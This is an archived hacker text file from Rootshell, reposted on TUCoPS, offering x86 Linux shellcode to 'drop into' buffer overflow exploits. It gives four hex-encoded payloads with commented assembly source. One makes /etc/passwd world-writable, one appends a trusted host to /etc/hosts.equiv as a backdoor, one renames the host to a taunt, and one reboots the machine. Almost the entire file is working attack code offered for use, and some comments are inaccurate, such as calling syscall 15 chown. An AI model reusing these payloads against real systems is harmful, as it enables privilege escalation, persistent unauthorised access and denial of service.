[ http://www.rootshell.com/ ]
-----------------[ begin asmcodes.txt ]---------------------
-- Assembly drop in replacements --
(Probably useless, but can be a little fun ;-) )
Here are some assembly instructions that you can drop into your favorite
buffer overflow exploit. Generally, replacing existing shellcodes in
existing buffer overruns with one these is all you need to do. Feel free to
modify and experiment with these. (Sorry about the null's in them before
;-) )
/* This one changes the mode on /etc/passwd to 777 */
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x1d"
"\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\xff\x01\x31\xc0\xb0"
"\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61"
"\x73\x73\x77\x64\x89\xec\x5d\xc3";
/* This one creates /etc/hosts.equiv with a host called b00ger */
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35"
"\x01\xfb\x31\xc0\x88\x43\x10\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba"
"\xa4\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x46\x01\xf9\x31"
"\xd2\xb2\x07\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65"
"\x74\x63\x2f\x68\x6f\x73\x74\x73\x2e\x65\x71\x75\x69\x76\x01\x62\x30"
"\x30\x67\x65\x72\x0a\x89\xec\x5d\xc3";
/* This one is useless: it just changes the hostname to yEw_r_0wn3d */
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff"
"\x31\xc0\xb0\x4a\x31\xdb\xb3\x16\x01\xfb\x31\xc9\xb1"
"\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x79\x45\x77\x5f"
"\x72\x5f\x30\x77\x6e\x33\x64\x89\xec\x5d\xc3";
/* This is also useless: it just reboots an x86 machine */
char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff"
"\xff\xff\x31\xc0\xb0\x24\xcd\x80\x31\xc0\xb0"
"\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28"
"\xba\x67\x45\x23\x01\xcd\x80\x31\xc0\xb0\x01"
"\xcd\x80\x89\xec\x5d\xc3";
-- Source code --
# changes mode on /etc/passwd to 777
# making it writeable by anyone.
jmp rootshell
hey:
popl %edi
jmp yo
rootshell:
call hey
yo: # yo! w3rD!
# chmod() is system call 15 (0xf)
# (see /usr/include/asm/unistd.h)
# eax contains syscall number
xorl %ebx,%ebx # ebx has path to file
movb $(phile-yo),%bl
addl %edi,%ebx
xorb %al,%al # clear out al
movb %al,11(%ebx) # length of filename (11)
xorl %ecx,%ecx # clear out ecx
movw $00777,%cx # ecx contains mode 777
xorl %eax,%eax # clear out eax
movb $0xf,%al # syscall 15 (0xf) is chown
int $0x80 # interrupt (make call)
xorl %eax,%eax # clear eax
movb $0x01,%al # syscall 1 (0x01) is exit
int $0x80 # interrupt (make call)
phile:
.ascii \"/etc/passwd\" # /etc/passwd (11)
-------------------------
# Creates the file /etc/hosts.equiv if it does
# not exist (or appends to if it does) and will
# insert the host: b00ger
# changing this should be trivial
jmp rootshell
coded_by_bmV:
popl %edi
jmp phoo
rootshell:
call coded_by_bmV
phoo: # ok. I meant 'foo'
# open() is system call 5
# (see /usr/include/asm/unistd.h)
# eax contains syscall number
# ebx will have filename
# ecx contains open flags
# edx contains mode of file
# ->file is handle returned to eax
xorl %ebx,%ebx # clear ebx
movb $(file-phoo),%bl # filename to open in ebx
addl %edi,%ebx
xorl %al, %al # clear out al
movb %al,16(%ebx) # /etc/hosts.equiv (16)
xorl %ecx,%ecx # clear out ecx
movw $0x441,%cx # O_WRONLY | O_CREAT | O_APPEND
xorl %edx,%edx # clear out edx
movw $00644,%dx # mode 0644 -rw-r--r--
xorl %eax,%eax # clear eax
movb $0x5,%al # syscall 5 (0x5) is open()
int $0x80 # interrupt (make call)
# write() is system call 4
# (see /usr/include/asm/unistd.h)
# eax contains syscall 4 (write)
# ebx will have file handle
# ecx will point to "b00ger"
# edx is strlen("b00ger");
movl %eax,%ebx # move file handle to ebx
xorl %ecx, %ecx # clear out ecx
movb $(string-phoo),%cl # put "b00ger" in ecx
addl %edi,%ecx
xorl %edx,%edx # clear edx
movb $7,%dl # strlen("b00ger") ==7
xorl %eax,%eax # clear out eax
movb $0x04,%al # syscall 4 is write()
int $0x80 # interrupt (make call)
xorl %eax,%eax # clean out eax
movb $0x01,%al # syscall 1 (0x01) is exit()
int $0x80 # interrupt (make call)
# exit() should close file
file:
.ascii \"/etc/hosts.equiv\"
.byte 1
string:
.ascii \"b00ger\n\"
-------------------------
# written just for grins ;-)
# code to change to hostname of the
# target machine to: yEw_r_0wn3d
# Yes, I know this is useless :P
jmp rootshell
by_bm5:
popl %edi
jmp asmcode
rootshell:
call by_bm5
asmcode: # assembly code ?
# 74 (0x4a) is sethostname()
# (see /usr/include/asm/unistd.h)
# eax will have syscall 74
# ebx points to "yEw_r_0wn3d"
# ecx= strlen("yEw_r_0wn3d")==11
xorl %eax,%eax # clear out eax
movb $0x4a,%al # move 74 (sethostname()) to al
xorl %ebx,%ebx # clear out ebx
movb $(string-asmcode),%bl # put yEw_r_0wn3d in ebx
addl %edi,%ebx
xorl %ecx,%ecx # clear out ecx
movb $0x0b,%cl # strlen("yEw_r_0wn3d")==0xb
int $0x80 # interrupt (make call)
xorl %eax,%eax # clear out eax
movb $0x01,%al # syscall 1 (0x01) is exit()
int $0x80 # interrupt (make call)
.byte
string:
.ascii \"yEw_r_0wn3d\"
-------------------------
# reboots a Linux x86 box
# also quite useless, but
# good for learning.
jmp rootshell
coded_by_bmV:
popl %edi
jmp reb00t
rootshell:
call coded_by_bmV
reb00t: # reboot Linux
# sync() is syscall 36
# (see /usr/include/asm/unistd.h)
xorl %eax,%eax # clear out eax
movb $0x24,%eax # make syscall to sync()
int $0x80 # interrupt (make call)
# reboot() is syscall 88 (0x58)
# (see /usr/include/asm/unistd.h)
# eax contains syscall 88 (reboot)
# ebx will contain magic
# ecx will contain magic2
# (see manual page for reboot)
xorl %eax,%eax # clear out eax
movb $0x58,%eax # move 88 (reboot()) to eax
movl $0xfee1dead,%ebx # put magic into ebx
movl $672274793,%ecx # put magic2 into ecx
movl $0x1234567,%edx # put flag into edx
# read reboot manpage!
int $0x80 # interrupt (make call)
xorl %eax,%eax # clear out eax
movb $0x01,%al # syscall 1 (0x01) is exit()
int $0x80 # interrupt (make call)
-------------------------
--> Have fun!
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
